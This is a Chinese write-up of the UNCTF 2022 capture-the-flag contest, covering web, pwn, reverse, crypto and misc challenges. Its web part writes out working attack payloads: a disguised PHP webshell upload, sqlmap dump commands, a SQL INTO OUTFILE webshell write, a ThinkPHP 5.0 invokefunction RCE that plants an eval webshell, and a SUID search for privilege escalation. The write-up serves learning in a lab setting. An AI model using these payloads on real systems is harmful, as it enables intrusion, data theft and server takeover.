前前言:UNCTF我可太爱了!题目有趣新颖,适合我这种菜鸡练练手,涨涨知识,本来只有前20名有小奖品,后来拓展到前100,我直接吹爆!
前言:本人蒟蒻misc签到手。其他方向也只会最最基础的,广而不精。
本文记录了Alplexchur的解题思路,有种脑干缺失的美,各位有缘来到这里的大佬请多多指教。
Web
签到-吉林警察学院
签到题,好耶!
打开,不会。下一道。
easy_upload-云南警官学院
试着上传几个文件,发现png可以上传,于是在txt里写个最基础的一句话木马。(捏麻麻滴本来写在这里的,结果发出去会报毒,具体🐴自行搜索啦,还可以学下各种🐴的绕过姿势,这里用最最原始的就够啦。)
后缀改成png,上传,burp抓包,丢到repeater
这里改成php,antsword连接这个上传后临时保存的网址,密码就是cmd
http://79d61743-4b56-47b1-82c9-5161d5005a44.node.yuzhian.com.cn/uplO4d/1.php
在/home/ctf/flag这个目录找到flag~
UNCTF{726e4ec5-6016-457c-a562-39968f9dea02}
ezgame-浙江师范大学
ctrl+u查看源代码,发现调用了main.js,追踪main.js,搜索ctf字符串
{function _0x1a71(_0x576391,_0x47cdf6){var _0x33c239=_0x3005();return _0x1a71=function(_0x18fbb7,_0x4f7b9f){_0x18fbb7=_0x18fbb7-(-0x40*0x85+-0x9dc*0x3+0x658*0xa);var _0x5a7e37=_0x33c239[_0x18fbb7];return _0x5a7e37;},_0x1a71(_0x576391,_0x47cdf6);}function _0x3005(){var _0x313bce=['86VkibmA','fe7b163f8d','6833565vBFVDj','23742ODGjjF','unctf{c5f9','d3}','1335DfKYdi','6442920PCnqhb','781140poNcpx','a27d-6f88-','795305dViflS','1569524rbiRmt','49fb-a510-','88IpXszc','13033ieCwIU','6GgaKPA'];_0x3005=function(){return _0x313bce;};return _0x3005();}var _0x57214f=_0x1a71;(function(_0x5f4f7e,_0x564c49){var _0x5561c3=_0x1a71,_0x56ec78=_0x5f4f7e();while(!![]){try{var _0xe4411f=-parseInt(_0x5561c3(0xa5))/(-0x2369+-0x618*0x4+0x3bca)*(parseInt(_0x5561c3(0xa7))/(0xac1+-0x3*0x881+-0x1*-0xec4))+parseInt(_0x5561c3(0xa6))/(0x24c5+0x783+-0x2c45)*(parseInt(_0x5561c3(0xa2))/(-0xe2e+-0x1c7d+0x2aaf))+-parseInt(_0x5561c3(0x9d))/(-0x1870+-0x1*-0x1dbd+-0x548)*(-parseInt(_0x5561c3(0xaa))/(-0x9*-0x287+0x5*-0x165+-0x2a0*0x6))+-parseInt(_0x5561c3(0xa1))/(0x4*0x9a3+-0x7*0x1d2+-0x19c7)+parseInt(_0x5561c3(0x9e))/(-0x27b+-0x206*-0x6+-0x9a1)+-parseInt(_0x5561c3(0xa9))/(0x66b+0xa39+-0x109b*0x1)+parseInt(_0x5561c3(0x9f))/(-0x8ba+0x1f1*0x10+0xb26*-0x2)*(-parseInt(_0x5561c3(0xa4))/(0x2548+0x1e3+-0x2720));if(_0xe4411f===_0x564c49)break;else _0x56ec78['push'](_0x56ec78['shift']());}catch(_0x1ed64e){_0x56ec78['push'](_0x56ec78['shift']());}}}(_0x3005,-0x909e0+0x62296*0x2+0x5bf33),alert(_0x57214f(0xab)+_0x57214f(0xa0)+_0x57214f(0xa3)+_0x57214f(0xa8)+_0x57214f(0x9c)));}
发现一大串可疑字符串。F12丢到控制台里执行,弹出flag。
unctf{c5f9a27d-6f88-49fb-a510-fe7b163f8dd3}
我太喜欢bilibili大学啦--中北大学
打开网址,ctrl+f搜索ctf,马上就找到了。
UNCTF{c25f60f5-1651-44de-b0c5-c47d8f477eeb}
babyphp-中国人民公安大学
扫描器扫一下,发现有个index.php进入
<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_POST["a"])){
if($_POST["a"]==0&&$_POST["a"]!==0){
if(isset($_POST["key1"])&isset($_POST["key2"])){
$key1=$_POST["key1"];
$key2=$_POST["key2"];
if ($key1!==$key2&&sha1($key1)==sha1($key2)){
if (isset($_GET["code"])){
$code=$_GET["code"];
if(!preg_match("/flag|system|txt|cat|tac|sort|shell|\.| |\'/i", $code)){
eval($code);
}else{
echo "有手就行</br>";
}
}else{
echo "老套路了</br>";
}
}else{
echo "很简单的,很快就拿flag了~_~</br>";
}
}else{
echo "百度就能搜到的东西</br>";
}
}else{
echo "easy 不 easy ,baby 真 baby,都是玩烂的东西,快拿flag!!!</br>";
}
}
OK审计一下开始绕过,先用a=0绕过第一层。
这里介绍一下弱比较,PHP中==是弱比较。某些密文经过sha1、md5后会以0e开头,这时PHP的弱比较判定是科学计数法表示的数字,即都为0。或者用数组的方式绕过,传入数组,经sha1、md5后都返回NULL。
下附几个特殊的密文
md5
240610708:0e462097431906509019562988736854
QLTHNDT:0e405967825401955372549139051580
QNKCDZO:0e830400451993494058024219903391
PJNPDWY:0e291529052894702774557631701704
NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
MMHUWUV:0e701732711630150438129209816536
MAUXXQC:0e478478466848439040434801845361
sha1
10932435112: 0e07766915004133176347055865026311692244
aaroZmOk: 0e66507019969427134894567494305185566735
aaK1STfY: 0e76658526655756207688271159624026011393
aaO8zKZF: 0e89257456677279068558073954252716165668
aa3OFF9m: 0e36977786278517984959260394024281014729
0e1290633704: 0e19985187802402577070739524195726831799
我太喜欢bilibili大学啦修复版-中北大学
搜索hint,找到YWRtaW5fdW5jdGYucGhwbase64后得到admin_unctf.php
进入发现有个登陆页面,抓包得到账号密码unctf2022。
随便注-云南警官学院
好熟悉的题,好像在哪里做过。 sqlmap跑一下
sqlmap -u URL/?id=1 --dbs #爆数据库名
sqlmap -u URL/?id=1 -D ctftraining --tables #爆表名
sqlmap -u URL/?id=1 -D ctftraining -T FLAG_TABLE --columns #爆字段名
sqlmap -u URL/?id=1 -D ctftraining -T FLAG_TABLE -C FLAG_COLUMN --dump #爆字段值
兴冲冲地爆完了结果发现字段值是空的,彻底疯狂!于是就翻遍了整个库,看到有个bird,dog什么的表,那里有个hint说flag在库中。后来想到sql注入一句话🐴拿shell,试了几下吧🐴加到index.php了但我还是连不上,有点怪的。
id=1' union select 1,"这里放一句话🐴",3 into OUTFILE '/var/www/html/index.php' --+
给你一刀-西南科技大学
打开页面随便get传一个s=1,报错出版本为5.0.20,然后就开始搜索,发现可以getshell的漏洞。
/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php highlight_file(__FILE__);@eval($_POST[cmd]);?>
传入,然后蚁剑用密码cmd连上test.php,拿到shell。翻了几下发现权限不够,进入虚拟终端进行提权。
find / -user root -perm -4000 -print 2>/dev/null
ez2048-中南大学
2048经典永流传,兴冲冲的打开F12,嚯,好啊,给我每100ms弹个debugger,OK,我们点禁用断点或者按快捷键ctrl+f8,直接反反debugger。
setInterval(() => new Function().constructor("debugger").apply("action"), 100);
在game.js中找到listenerFn(direction)函数,其中有个tile.value * 2,把2改成512,这样稍微合成几次就到2048了,然后还差个邀请码。
下面还有个checkInvited的函数。尝试逆向了下,发现逆不来,遂放弃,交给有缘人去破解吧~
checkInvited() {
let args = [...arguments];
let buf = new ArrayBuffer(24);
const view = new DataView(buf);
view.setUint8(0, 68);
view.setUint8(1, 51);
view.setUint8(2, 15);
view.setUint8(3, 80);
view.setUint16(4, 0x0e5d, true);
view.setUint16(6, 0x323a, true);
view.setUint16(8, 0x3058, true);
view.setUint16(10, 0x1a2a, true);
view.setUint32(12, 0x0512160d, true);
view.setUint32(16, 0x02560002);
view.setUint32(20, 0x130000);
function check(code) {
if (code.length !== 24) return false;
let encode = [];
for (let i = 0; i < code.length; i++) {
if (~i % 2 === 0) {
encode.push(code.charCodeAt(i) ^ code.charCodeAt(i - 2));
} else {
encode.push(code.charCodeAt(i) ^ code.charCodeAt(i + 1));
}
}
for (let i = 0; i < code.length; i++) {
if (view.getInt8(i) !== encode[i]) return false;
}
return true;
}
Pwn
welcomeUNCTF2022-云南警官学院
int func()
{
char s2[11]; // [esp+Ch] [ebp-1Ch] BYREF
char s[13]; // [esp+17h] [ebp-11h] BYREF
strcpy(s2, "UNCTF&2022");
puts("Welcome to UNCTF2022 Please enter the password:");
gets(s);
if ( !strcmp(s, s2) )
return system("cat /flag");
else
return puts("wrong!!!");
}
手动连不太行,会吧\n也传过去,我们就写个脚本。
from pwn import *
context.log_level = 'debug'
io= remote("node.yuzhian.com.cn",31308)
payload=b"UNCTF&2022"
io.sendline(payload)
io.interactive()
UNCTF{564914f4-8362-41a8-a84f-9b87aac8630c}
Reverse
whereisyourkey-广东海洋大学
a=[118,103,112,107,99,109,104,110,99,105]
b=""
for i in range(len(a)):
#print(chr(a[i]))
if(a[i]==109):
b+=chr(a[i])
elif(a[i]<=110):
b+=chr(a[i]-2)
elif (a[i]>111):
b+=chr(a[i]+3)
print(b)
UNCTF{yesiamflag}
ezzzzre-广东海洋大学
a='HELLOCTF'
b=''
for i in a:
b+=chr(2*ord(i)-69)
print(b)
UNCTF{KESSYAcG}
Crypto
md5-1-西南科技大学
from hashlib import md5
ans=''
sheet=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'
,'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
,'0', '1', '2', '3', '4', '5', '6', '7', '8', '9','{','}']
with open("out.txt") as o:
lines = o.readlines()
for line in lines:
for i in sheet:
if(line[0:-1] == md5(i.encode()).hexdigest()):
ans+=i
print(ans)
UNCTF{e84fed028b9046fc0e8f080e96e72184}
md5-2-西南科技大学
from hashlib import md5
ans=''
sheet=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'
,'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
,'0', '1', '2', '3', '4', '5', '6', '7', '8', '9','{','}']
temp=[]
with open("233.txt") as o:
lines = o.readlines()
for i in range(len(lines)):
if(i==0):
temp.append(lines[0][0:-1])
else:
temp.append(str(hex(int(lines[i][:-1],16)^int(temp[i-1],16)))[2:])#异或,注意是要跟前一行的结果异或
for i in range(len(temp)):
if(len(temp[i])!=32):
temp[i]="0"*(32-len(temp[i]))+temp[i]#莫名其妙前面会少个0,这里修复下开头是0的md5
for i in temp:
for j in sheet:
if(i == md5(j.encode()).hexdigest()):
ans+=j
print(ans)
UNCTF{a197271943ceb3c3fe98bcadf10c29d4}
dddd-西南科技大学
一眼莫斯密码,吧/去掉,ctrl+h替换成0和1都试一下,得到flag。
UNCTF{Y4S_TH1S_JUST_M0RSE}
ezxor-浙江师范大学
https://www.ruanx.net/many-time-pad/
https://www.cnblogs.com/labster/p/13635902.html
结合这两篇文章食用,人眼OCR到眼睛疼。。。
UNCTF{Y0u_are_very_Clever!!!}
Single table-西南科技大学
找到如图的规律,Playfair加密的变种?
table=[
'B','C','D','E','F',
'G','H','I','K','M',
'N','O','Q','R','S',
'T','U','V','W','X',
'Z','P','L','A','Y']
key="PLAY"
c="OTUBM{BCQS_PHW_OQAU_AYFMKLWS}"
d=OT UB MB CQ SP HW OQ AU AY FM KL WS
p=UN CT FG OD YO UK NO WP LA YF AI RX
下划线有点怪,自己修正了下。
UNCTF{GOD_YOU_KNOW_PLAYFAIR}
caesar-西南科技大学
a="B6vAy{dhd_AOiZ_KiMyLYLUa_JlL/HY_}"
b=["{","}","_"]
sheet=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', '+', '/']#base64表没有等号
ans=''
for i in range(len(sheet)):
for j in range(len(a)):
if(a[j] in b):
ans+=a[j]
else:
ans+=sheet[(sheet.index(a[j])+i) % len(sheet)]
print(ans)
ans=""
换表凯撒,网上搜个base64的符号表,穷举爆破,开头UNCTF的就是flag了,这里值得注意的是要把末尾的_删了。
UNCTF{w0w_Th1s_d1fFerent_c4eSar}
ezRSA-广东海洋大学
题目
import libnum
p=libnum.generate_prime(256)
e=65537
m=flag
m=libnum.s2n(m)
n=p**4
phi_n=p**4-p**3
d=libnum.invmod(e,phi_n)
c=pow(m,e,n)
print ("n=",n)
print ("e=",e)
print ("c=",c)
62927872600012424750752897921698090776534304875632744929068546073325488283530025400224435562694273281157865037525456502678901681910303434689364320018805568710613581859910858077737519009451023667409223317546843268613019139524821964086036781112269486089069810631981766346242114671167202613483097500263981460561
65537 56959646997081238078544634686875547709710666590620774134883288258992627876759606112717080946141796037573409168410595417635905762691247827322319628226051756406843950023290877673732151483843276348210800329658896558968868729658727981445607937645264850938932045242425625625685274204668013600475330284378427177504
n是308位,位数比较小,直接yafu分解,一秒得到
p=890657567915953233586038579397839 36930073695697065732353414009005162022399741
phi_p=p^4-p^3=62927872600012424750752897921698090776534304875632744929068546073325488283529318867491016397452175403161432810606988470934463805691818871507671400886648566908233760842017413498368260708453999854033497856778333075381078231548226770214171227019321093546024517072860049563292200161449041449144992746910155634540
d=20755434245111441985630630658642078981728878865246767694382496786868543795669160270376822412489528411656583786778165964077076607471113366899763873866148823142474952688726191467121295199260595706925676940844415334199572562875115886673932667702971523842880601203090511182387417774537779879529398099046491664193
然后丢RSATool里解密得到明文即可。
UNCTF{pneum0n0ultram01cr0sc0p01cs01l01c0v0lcan0c0n010s01s}
babyRSA-广东海洋大学
题目
from Crypto.Util.number import *
from secret import flag
import libnum
flag="UNCTF{*************************}"
m=libnum.s2n(flag)
p=libnum.generate_prime(1024)
q=libnum.generate_prime(1024)
n=p*q
e=6
c=pow(m,e,n)
M=((m>>60)<<60)
print("n=",n)
print("c=",c)
print("((m>>60)<<60)=",M)
'''
n=25300208242652033869357280793502260197802939233346996226883788604545558438230715925485481688339916461848731740856670110424196191302689278983802917678262166845981990182434653654812540700781253868833088711482330886156960638711299829638134615325986782943291329606045839979194068955235982564452293191151071585886524229637518411736363501546694935414687215258794960353854781449161486836502248831218800242916663993123670693362478526606712579426928338181399677807135748947635964798646637084128123883297026488246883131504115767135194084734055003319452874635426942328780711915045004051281014237034453559205703278666394594859431
c=15389131311613415508844800295995106612022857692638905315980807050073537858857382728502142593301948048526944852089897832340601736781274204934578234672687680891154129252310634024554953799372265540740024915758647812906647109145094613323994058214703558717685930611371268247121960817195616837374076510986260112469914106674815925870074479182677673812235207989739299394932338770220225876070379594440075936962171457771508488819923640530653348409795232033076502186643651814610524674332768511598378284643889355772457510928898105838034556943949348749710675195450422905795881113409243269822988828033666560697512875266617885514107
M=11941439146252171444944646015445273361862078914338385912062672317789429687879409370001983412365416202240
'''
e很小,典型的小e工具,这里强烈推荐风大的轩禹CTF_RSA工具3.6!一把梭
得到m=
11941439146252171444944646015445273361862078914338385912062672317789429687879409370002429378909002883709
然后libnumn2s(m)即可得到flag。
UNCTF{27a0aac7-76cb-427d-9129-1476360d5d1b}
easy_RSA-中国人民公安大学
题目
from Crypto.Util.number import *
from gmpy2 import *
from secret import flag
import random
assert flag.startwith(b"flag{")
e=0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
m=bytes_to_long(flag)
p=getprime(512)
q=getprime(512)
n=p*q
c=pow(m,e,n)
print("n={}".format(n))
print("c={}".format(c))
tmp=random.randint(100,300)
print("p>>tmp={}".format(p>>tmp))
#c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
#n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
#p>>200=8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857
已知n,c和p的高200位,判断是RSA的p高位泄露攻击,风大的RSA3.6工具内置了脚本,这里调用下CV工程师的三个键位,再自己改下参数。由于电脑没装sage,就放到网页版里运行~
https://cocalc.com/
注意要选JupyterLab里的MathSage。
from sage.all import *
e = 0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p4 = 8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857
pbits = 512
kbits = pbits - p4.nbits()
print(p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))
f = x + p4
roots = f.small_roots(X=2^kbits, beta=0.4)
if roots:
p = p4+int(roots[0])
print ("n: ", n)
print ("p: ", p)
print ("q: ", n/p)
得到结果
312
n: 102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p: 13150231070519276795503757637337326535824298772055543325920447062237907554543786311611680606624189166397403108357856813812282725390555389844248256805325917
q: 7763324082495716852870824316200424018139567206154696104953385573761033160220038511251268217230653629388520339723337700045392099450472580225771046069366909
UNCTF{It is a very_intersting_test!!!}
Misc
剥茧抽丝-内蒙古警察职业学院
用S?e?a?o?r?p?y解第一个附件,得到一个有零宽字符隐写的1.txt和flag.zip。
零宽字符隐写解密得到密文egmtteuec
flag.zip中有2.txt和flag.zip,尝试伪加密,未果,发现两个txt可能有所联系,取1.txt的中文部分压缩后进行明文攻击,成功爆出内容。
syslog-浙江师范大学
010看一下附件,发现zip中还有压缩包,丢到kali里
binwalk stytem.zip -e
得到一个带密码的flag.zip
打开syslog查找==,找到一串password,base64解密得到压缩包密码password is U6nu2_i3_b3St
再用密码解压得到flag~
UNCTF{N1_sH3_D0n9_L0g_dE!}
magic_word-西南科技大学
改后缀为zip,在document.xml中找到正文内容,发现零宽隐写。那么有小伙伴就要问了,我怎么知道这里有没有零宽字符隐写,你给我去spa!OK接下来教大家怎么看是不是零宽字符隐写。
- txt文本打开,光标随便定位几个,看列数是不是很怪
- 复制到CyberChef里,若有零宽字符会出现小点点。
贴个CyberChef的地址,由于在线访问比较慢,强烈建议下载到本地,非常滴好用,打开网站找最新版的Release即可。
https://github.com/gchq/CyberChef
找个网站解密
https://330k.github.io/misc_tools/unicode_steganography.html
The Old Man and the SeaHe was an old man who fished alone in a skiff in the Gulf Stream and he had gone eighty-four days now without taking a fish. In the first forty days a boy had been with him. But after forty days without a fish the boy's parents had told him that the old man was now definitely and finally salao,which is the worst form of unlucky, and the boy had gon at their orders in another boat which caught three good fish the first week. It made the boy sad to see the old man come in each day with his saking a fish. In the first forty days a boy had been with him. But after forty days without a fish the boy's parents had told him that the old man was now definitely and finally salao,which is the worst form of unlucky, and the boy had gone at their orders in another boat which caught three good fish the first week. It made the boy sad to see the old man come in each day with his skiff empty and he always went down to help him carry either the coiled lines or the gaff and harpoon and the sail that was furled aroundthe mast. The sail was patched with flour sacks and, furled, it looked like the flag of permanent defeat.The old man was thin and gaunt with deep wrinkles in the back of his neck.The brown blotches of the benevolent skin cancer the sun brings from its reflection on the tropic sea were on his cheeks. The blotches ran well down the sides of his face and his hands had the deep-creased scars from handling heavy fish on the cords. But none of these scars were fresh. They were as old as erosions in fishless desert.
UNCTF{We1come_new_ctfer}
清和fan-江西警察学院
b站搜下得到压缩包密码836885_2022/05/20
LSB隐写,丢入stegsolve得到压缩包密码qq857488580
巨鱼-河南理工大学
下载来挺大的一只png,丢010看发现靠近尾部的位置有压缩包标志且报CRC错,foremost提取,得到一个压缩包,破解正确宽高后得到密码无所谓我会出手
这里贴一个破解正确宽高的脚本
import binascii
import struct
import sys
file = "C:\\Users\\Administrator\\Desktop\\" +input("图片的地址")
fr = open(file,'rb').read()
data = bytearray(fr[0x0c:0x1d])
crc32key = eval('0x'+str(binascii.b2a_hex(fr[0x1d:0x21]))[2:-1])
#原来的代码: crc32key = eval(str(fr[29:33]).replace('\\x','').replace("b'",'0x').replace("'",''))
n = 4095
for w in range(n):
width = bytearray(struct.pack('>i', w))
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x+4] = width[x]
data[x+8] = height[x]
crc32result = binascii.crc32(data) & 0xffffffff
if crc32result == crc32key:
print(width,height)
newpic = bytearray(fr)
for x in range(4):
newpic[x+16] = width[x]
newpic[x+20] = height[x]
fw = open(file+'.png','wb')
fw.write(newpic)
fw.close
sys.exit()
解压得到flagisnothere.zip和flag.txt,一眼假flag,于是我们继续研究flagisnothere.zip。
试了几下发现是伪加密。
java -jar .\ZipCenOp.jar r .\flagisnothere.zip
解压得到pass.png和带密码的flag.pptx。
这个pass.png。。。一言难尽啊!梦回转专业之前的环境科学课程,化学名为六氯环己烷,别名666,于是就用666解密flag.pptx,成功啦!
PPT里有五张幻灯片,没找到flag,这里值得注意的是,word、excel、ppt文件是可以用压缩文件查看的,于是我们改后缀为zip并解压,发现一张图thumbnail.jpeg,试了010、隐写都没用,翻译了下thumbnail是缩略图的意思,还真的发现PPT的缩略图与幻灯片都不一样,下面的研究重点就到了如何提取PPT的缩略图,但是找遍了也没找到方法。。。
突然想起了"文字隐写",翻到第五张幻灯片,找到啦!还真是最最纯真的隐写。。。
把字体颜色改成了红色方便看一点。
UNCTF{y0u_F1nd_1t!}
我小心海也绝非鳝类-中国计量大学现代科技学院
注意看,这个心海说的是F#S<YIcHnAG;
经过base92后得到flaginmd5
丢到010尾部有个RUFTWUxTQg==
经过base64后得到EASYLSB
贝斯家族的侵略-中国地质大学武汉
一眼明文攻击,吧hint用bandizip压缩一下,丢到ARCHPR进行明文攻击,第一轮密钥搜完就可以停止了,然后点确定,吧解密的压缩包保存一下。
点开flag发现超级超级多的base编码的字符串,一眼base64隐写,这里贴个祖传脚本。
# base64隐写
import base64
def get_diff(s1, s2):
base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
res = 0
for i in range(len(s2)):
if s1[i] != s2[i]:
return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
return res
def b64_stego_decode():
file = open("flag.txt","rb")
x = '' # x即bin_str
lines = file.readlines()
for line in lines:
l = str(line, encoding = "utf-8")
stego = l.replace('\n','')
#print(stego)
realtext = base64.b64decode(l)
#print(realtext)
realtext = str(base64.b64encode(realtext),encoding = "utf-8")
#print(realtext)
diff = get_diff(stego, realtext) # diff为隐写字串与实际字串的二进制差值
n = stego.count('=')
if diff:
x += bin(diff)[2:].zfill(n*2)
else:
x += '0' * n*2
i = 0
flag = ''
while i < len(x):
if int(x[i:i+8],2):
flag += chr(int(x[i:i+8],2))
i += 8
print(flag)
if __name__ == '__main__':
b64_stego_decode()
吧结果丢到cyberchef里hex一下,下载到本地,发现尾部有一串字符串Filename:Macro.mrd,然后就去搜mrd是什么鬼文件。
CatchJerry-华中科技大学
用WireShark打开瞄了一眼发现键盘流量和鼠标流量混杂。
先用
tshark -r 1.pcap -T json > 3.json
提取json文件,发现相关数据存在usbhid.data中。
下一步提取usbhid.data。
tshark -r 1.pcap -T fields -e usbhid.data | sed '/^\s*$/d' > usbdata.txt
这里值得注意的是用通配符过滤一下空行什么的乱七八糟的东西,不然可能会出乱七八糟的问题。OK接下来我们上祖传脚本!(我最喜欢的一集~
方便格式统一,先来个加冒号的脚本~
f=open('usbdata.txt','r')
fi=open('out.txt','w')
while 1:
a=f.readline().strip()
if a:
if len(a)==8: # 键盘流量len=16,鼠标流量len=8
out=''
for i in range(0,len(a),2):
if i+2 != len(a):
out+=a[i]+a[i+1]+":"
else:
out+=a[i]+a[i+1]
fi.write(out)
fi.write('\n')
else:
break
fi.close()
得到如下结果
再来个鼠标流量转换的脚本
nums = []
keys = open('out.txt','r')
f = open('xy.txt','w')
posx = 0
posy = 0
for line in keys:
if len(line) != 12+12 :#正常来说这里是12位的但是这里的鼠标流量是24位
continue
x = int(line[3:5],16)
y = int(line[6:8],16)
if x > 127 :
x -= 256
if y > 127 :
y -= 256
posx += x
posy += y
btn_flag = int(line[0:2],16) # 1 for left , 2 for right , 0 for nothing
if btn_flag == 1 : # 1 代表左键 自己01都试下有结果了就可以
f.write(str(posx))
f.write(' ')
f.write(str(posy))
f.write('\n')
f.close()
得到如下结果
然后打开gnuplot,执行plot "xy.txt"吧坐标图形化。
得到如图结果。
但是这是反的,丢PS里随便转几下。
OK接下来我们处理键盘流量,上脚本!
这个是Python2的。
mappings = { 0x04:"A", 0x05:"B", 0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G", 0x0B:"H", 0x0C:"I", 0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O", 0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5", 0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]", 0X2B:" ", 0x2C:" ", 0x2D:"-", 0x2E:"=", 0x2F:"[", 0x30:"]", 0x31:"\\", 0x32:"~", 0x33:";", 0x34:"'", 0x36:",", 0x37:"." }
nums = []
keys = open('out.txt')
for line in keys:
if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
continue
nums.append(int(line[6:8],16))
keys.close()
output = ""
for n in nums:
if n == 0 :
continue
if n in mappings:
output += mappings[n]
else:
output += '[unknown]'
print 'output :\n' + output
这个是Python3的。
normalKeys = {
"04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
"09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
"0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
"13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
"18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
"1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
"22":"5", "23":"6","24":"7","25":"8","26":"9",
"27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
"2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
"32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
"38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
"3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
"44":"<F11>","45":"<F12>"}
shiftKeys = {
"04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
"09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
"0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
"13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
"18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
"1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
"22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
"28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
"2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
"34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
"3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
"41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')
for line in keys:
try:
if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
else:
output += ['[unknown]']
except:
pass
keys.close()
flag=0
print("".join(output))
for i in range(len(output)):
try:
a=output.index('<DEL>')
del output[a]
del output[a-1]
except:
pass
for i in range(len(output)):
try:
if output[i]=="<CAP>":
flag+=1
output.pop(i)
if flag==2:
flag=0
if flag!=0:
output[i]=output[i].upper()
except:
pass
print ('output :' + "".join(output))
得到如图结果
拼接起来得到最终结果~
